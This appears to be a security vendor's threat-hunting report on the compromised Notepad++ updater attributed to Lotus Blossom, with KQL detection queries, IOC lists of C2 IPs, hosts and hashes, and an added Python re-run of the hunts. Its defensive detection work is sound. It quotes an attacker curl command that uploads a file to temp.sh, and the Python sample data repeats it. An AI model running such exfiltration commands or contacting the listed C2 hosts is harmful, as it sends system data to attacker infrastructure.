Threat Hunting performed for malicious Notepad++ updates

Summary
On 2 February 2026, Notepad++ reported that its website had been compromised by an APT group [1].
The attackers modified the update script so that specific targets were served malicious updates when their Notepad++ installation checked for updates.
On the same day, Rapid7 released a blog post with indicators of compromise and attributed the attack to the Chinese APT group Lotus Blossom [2].
The day after, Kaspersky released a blog post with additional indicators of compromise and noted that they had observed victims in El Salvador, Vietnam, Australia and the Philippines [3].
The threat hunting efforts of the SamurAI MDR analysts focused on searching for the reported static and behavioral indicators, as well as on strengthening future detection of similar operations.
Technical Details
The attackers regularly rotated payloads and command and control servers in order to remain undetected and to reduce linkage between targeted victims.
The malware used was a mix of Cobalt Strike and a custom backdoor that Rapid7 named Chrysalis.
Threat Hunting Methodologies
The following subsections contain the threat hunting methodologies used throughout the threat hunt.
Suspicious child processes from Notepad++ updater process
In order to investigate suspicious child processes spawned by the Notepad++ updater (gup.exe), the following Advanced Query was used:
events | where parent_image endswith "\\gup.exe"
Search for URL paths utilized by the CobaltStrike Beacons
Based on the URL paths used by the CobaltStrike beacons, the following threat hunt was performed:
events
| where http_method=="POST" and uri_path in~ (
"/users/admin",
"/api/update/v1",
"/api/FileUpload/submit",
"/api/getInfo/v1",
"/help/Get-Start",
"/resolve",
"/dns-query"
) and url_host !endswith "cloudflare-dns.com" and url_host !endswith "dns.google" and url_host !endswith ".quad9.net"
Search for temp.sh file upload
Kaspersky reported that the threat actor also used the website temp[.]sh to exfiltrate system information:
curl.exe -F "file=@1.txt" -s https://temp.sh/upload
A Sigma rule that catches this behavior based on endpoint process events has been in place since November 2025 [4].
The following KQL query was used to hunt for similar behavior in proxy logs:
events | where url_host == "temp.sh" and http_method== "POST" and uri_path == "/upload"
Additionally, the Sigma rule called "Legitimate API services sometimes abused for C2 communication" was updated in our Hunting Engine to cover this behavior and detect the activity within proxy logs [5].
Search for file and network artifacts
The reported network indicators and file hashes were also queried for.
events | where
// ---- Exact IP matches (from both articles) ----
dest_ip in (
"45.76.155.202", // Securelist: malicious update host (Chains #1 & #2)
"45.77.31.210", // Securelist: Beacon download/C2
"45.32.144.255", // Securelist: malicious update host (Chain #3)
"95.179.213.0", // Both: update host observed in October 2025
"61.4.102.97" // Rapid7: resolves for api.skycloudcenter[.]com
)
or
// ---- Exact host matches (case-insensitive) ----
url_host in~ (
"cdncheck.it.com", // Securelist: Beacon C2 and download paths
"temp.sh", // Securelist: staging/LOL-C2 for system info
"self-dns.it.com", // Securelist: system info upload
"safe-dns.it.com", // Securelist: downloader + Beacon C2
"api.wiresguard.com", // Both: Metasploit downloader / Beacon C2
"api.skycloudcenter.com" // Rapid7: Chrysalis backdoor C2
) or
// ---- File hashes in reports (SHA-1) ----
filehash_sha1 in (
"8e6e505438c21f3d281e1cc257abdbf7223b7f5a",
"90e677d7ff5844407b9c073e3b7e896e078e11cd",
"573549869e84544e3ef253bdba79851dcde4963a",
"13179c8f19fbf3d8473c49983a199e6cb4f318f0",
"4c9aac447bf732acc97992290aa7a187b967ee2c",
"821c0cafb2aab0f063ef7e313f64313fc81d46cd",
"06a6a5a39193075734a32e0235bde0e979c27228",
"9c3ba38890ed984a25abb6a094b5dbf052f22fa7",
"ca4b6fe0c69472cd3d63b212eb805b7f65710d33",
"0d0f315fd8cf408a483f8e2dd1e69422629ed9fd",
"2a476cfb85fbf012fdbe63a37642c11afa5cf020",
"d7ffd7b588880cf61b603346a3557e7cce648c93",
"94dffa9de5b665dc51bc36e2693b8a3a0a4cc6b8",
"21a942273c14e4b9d3faa58e4de1fd4d5014a1ed",
"7e0790226ea461bcc9ecd4be3c315ace41e1c122",
"f7910d943a013eede24ac89d6388c1b98f8b3717",
"73d9d0139eaf89b7df34ceeb60e5f8c7cd2463bf",
"bd4915b3597942d88f319740a9b803cc51585c4a",
"c68d09dd50e357fd3de17a70b7724f8949441d77",
"813ace987a61af909c053607635489ee984534f4",
"9fbf2195dee991b1e5a727fd51391dcc2d7a4b16",
"07d2a01e1dc94d59d5ca3bdf0c7848553ae91a51",
"3090ecf034337857f786084fb14e63354e271c5d",
"d0662eadbe5ba92acbd3485d8187112543bcfbf5",
"9c0eff4deeb626730ad6a05c85eb138df48372ce"
)
Note that in the original query the comma separating "api.wiresguard.com" from "api.skycloudcenter.com" sat inside the trailing comment, which commented out the Chrysalis C2 host; the list above has it on its own line.
References
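The following is an added example, not code from this post or from the SamurAI hunting engine: it re-implements the hunts above (gup.exe child processes, Beacon URI paths with the DNS-over-HTTPS exclusion, the temp.sh upload, and the IOC match) as plain Python over a handful of constructed events, so the matching semantics can be checked offline before the KQL is run against real telemetry. Field names mirror the queries above (parent_image, http_method, uri_path, url_host, dest_ip, filehash_sha1); the image and command_line fields used for the endpoint-side curl check, the subset of three hashes, and all sample events are assumptions made for the example.

```python
"""Offline re-run of the Notepad++ hunting logic over constructed events.

Added example; field names follow the KQL in the post, sample events are
constructed and not real telemetry.
"""

BEACON_PATHS = {
    "/users/admin", "/api/update/v1", "/api/fileupload/submit",
    "/api/getinfo/v1", "/help/get-start", "/resolve", "/dns-query",
}
# /resolve and /dns-query are also legitimate DNS-over-HTTPS paths, so the hunt
# excludes the well-known public resolvers instead of alerting on every hit.
DOH_RESOLVER_SUFFIXES = ("cloudflare-dns.com", "dns.google", ".quad9.net")

IOC_IPS = {"45.76.155.202", "45.77.31.210", "45.32.144.255",
           "95.179.213.0", "61.4.102.97"}
IOC_HOSTS = {"cdncheck.it.com", "temp.sh", "self-dns.it.com",
             "safe-dns.it.com", "api.wiresguard.com", "api.skycloudcenter.com"}
# Three of the SHA-1s from the query above; extend with the rest as needed.
IOC_SHA1 = {"8e6e505438c21f3d281e1cc257abdbf7223b7f5a",
            "90e677d7ff5844407b9c073e3b7e896e078e11cd",
            "573549869e84544e3ef253bdba79851dcde4963a"}


def classify(event):
    """Return the names of the hunts an event matches (empty list if none)."""
    reasons = []
    parent = event.get("parent_image", "").lower()  # KQL endswith is case-insensitive
    method = event.get("http_method", "").upper()
    path = event.get("uri_path", "").lower()          # KQL in~ is case-insensitive
    host = event.get("url_host", "").lower()
    sha1 = event.get("filehash_sha1", "").lower()
    image = event.get("image", "").lower()
    cmd = event.get("command_line", "")

    # Hunt 1: anything spawned by the Notepad++ updater.
    if parent.endswith("\\gup.exe"):
        reasons.append("gup_child")
    # Hunt 2: POSTs to the Beacon profile paths, minus public DoH resolvers.
    if (method == "POST" and path in BEACON_PATHS
            and not host.endswith(DOH_RESOLVER_SUFFIXES)):
        reasons.append("beacon_uri")
    # Hunt 3 (proxy side): the temp.sh upload endpoint.
    if host == "temp.sh" and method == "POST" and path == "/upload":
        reasons.append("temp_sh_upload")
    # Hunt 3 (endpoint side, assumed fields): curl -F "file=@..." to temp.sh.
    if (image.endswith("\\curl.exe") and "-F" in cmd.split()
            and "file=@" in cmd and "temp.sh" in cmd.lower()):
        reasons.append("curl_upload")
    # Hunt 4: static IOCs. The KQL uses case-sensitive `in` for the hashes;
    # lowercasing here means an uppercase hash from another log source matches too.
    if (event.get("dest_ip") in IOC_IPS or host in IOC_HOSTS or sha1 in IOC_SHA1):
        reasons.append("ioc")
    return reasons


# Constructed sample events (not real telemetry) exercising each hunt.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
    {"id": 2, "http_method": "POST", "url_host": "cdncheck.it.com",
     "uri_path": "/api/update/v1"},
    {"id": 3, "http_method": "POST", "url_host": "cloudflare-dns.com",
     "uri_path": "/dns-query"},                       # legitimate DoH, excluded
    {"id": 4, "http_method": "POST", "url_host": "temp.sh", "uri_path": "/upload"},
    {"id": 5, "image": r"C:\Windows\System32\curl.exe",
     "command_line": 'curl.exe -F "file=@1.txt" -s https://temp.sh/upload'},
    {"id": 6, "http_method": "GET", "url_host": "www.example.com",
     "uri_path": "/index.html"},                      # benign, no match
    {"id": 7, "filehash_sha1": "90E677D7FF5844407B9C073E3B7E896E078E11CD"},
    {"id": 8, "dest_ip": "45.77.31.210", "http_method": "GET", "uri_path": "/"},
]


def hunt(events):
    """Map event id -> matched hunts for every event that matched at least one."""
    return {e["id"]: classify(e) for e in events if classify(e)}


if __name__ == "__main__":
    for eid, why in hunt(SAMPLE_EVENTS).items():
        print(f"event {eid}: {', '.join(why)}")
```

Two points worth carrying back to the KQL: the resolver exclusion is a plain suffix match, so a host such as xcloudflare-dns.com would also be excluded; anchoring the suffix with a leading dot (or matching the exact host names) closes that gap. And because `in` is case-sensitive in KQL, hash hunts across sources that log uppercase hashes should use `in~` or normalize the field first.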
[1] Notepad++ Hijacked by State-Sponsored Hackers
[2] The Chrysalis Backdoor: A Deep Dive into Lotus Blossom's toolkit (Rapid7)
[3] The Notepad++ supply chain attack - unnoticed execution chains and new IoCs (Kaspersky / Securelist)
[4] Potential data exfiltration via curl (Sigma rule)
[5] Legitimate API services sometimes abused for C2 communication (Sigma rule)